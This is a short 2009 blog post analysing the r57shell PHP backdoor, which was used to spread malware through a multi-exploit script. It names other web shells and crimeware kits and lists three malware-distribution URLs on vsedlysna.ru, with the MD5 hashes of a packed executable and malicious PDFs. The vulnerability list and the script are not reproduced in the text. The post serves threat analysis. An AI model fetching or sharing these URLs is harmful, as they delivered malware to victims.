Thursday, April 16, 2009

Scripting attack. Exploitation of multiple vulnerabilities

The execution of malicious code via scripting attacks are part of the folklore of the current malware. However, behind this whole battery of methods of infection, are involved applications designed to fully commit such malicious acts.

Usually, this is as crimeware applications zeus, barracuda, chamaleon, YES, etc., or remote shells written in PHP, as in this case, known r57shell.

There are many applications of this style (c99shell, c100shell, locus NetShell, etc.) that are implanted, usually in a vulnerable server via RFI (Remote File Inclusion) and used for mass-defacement that is say mass defacement of web pages.

However, while it's customary for the purpose of this, are fully employed to attacks via the Web through malicious code such as DDoS, SQL Injection and recruitment of zombie computers, among others.

As we can see through this second capture, the features it offers are many r57shell, and don't respond to a casual or trivial, the intention is to fully control the server where it's implanted. Ie, it's a backdoor from which an attacker to take complete control of the server, and each node in the same accommodation.

In this case, the PHP shell was being used to spread malware by exploiting the following vulnerabilities:
All exploits for these vulnerabilities are found in a single script whose appearance is similar to the following, which by the way, the catch has been cut.

Decoder to the script, you get the following URL's:
  • http://vsedlysna.ru/img/site/2/load.php?id=83 --> Download the file load.exe (MD5: 22027b5c4394c7095c4310e2ec605808) packed whith ASPack v2.12.
  • http://vsedlysna.ru/img/site/2/pdf.php?id=83 --> Download the file 9040.pdf (MD5: 3b9e76642e96f3626cf25b7f3f9d6c3a) where filename is a random value that changes for each download adopatando names like 8795.pdf, 7436.pdf, 6100.pdf, etc.
  • http://vsedlysna.ru/img/site/2/pdf.php?id=83&vis=1 --> Download pdf file with the extension whose name varies in each accessible following the same methodology as the previous case. In this case, the file is called 4099.pdf (MD5: 5caf548ff3e6ae0c9101ae647757a099).

# Jorge Mieres

No comments: